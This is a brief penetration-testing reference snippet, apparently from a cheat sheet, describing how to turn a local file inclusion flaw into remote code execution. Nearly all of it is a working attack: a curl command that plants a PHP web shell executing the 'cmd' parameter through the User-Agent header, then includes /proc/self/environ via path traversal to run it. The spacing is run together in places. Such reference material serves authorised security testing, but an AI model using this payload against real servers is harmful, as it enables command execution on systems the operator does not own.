Testers can abuse a process created due to a request. The payload is injected in the User-Agent header.
# Sending a request to $URL with a malicious user-agent# Accessing the payload via LFIcurl--user-agent"<?php passthru($_GET['cmd']); ?>"$URL/?parameter=../../../proc/self/environ
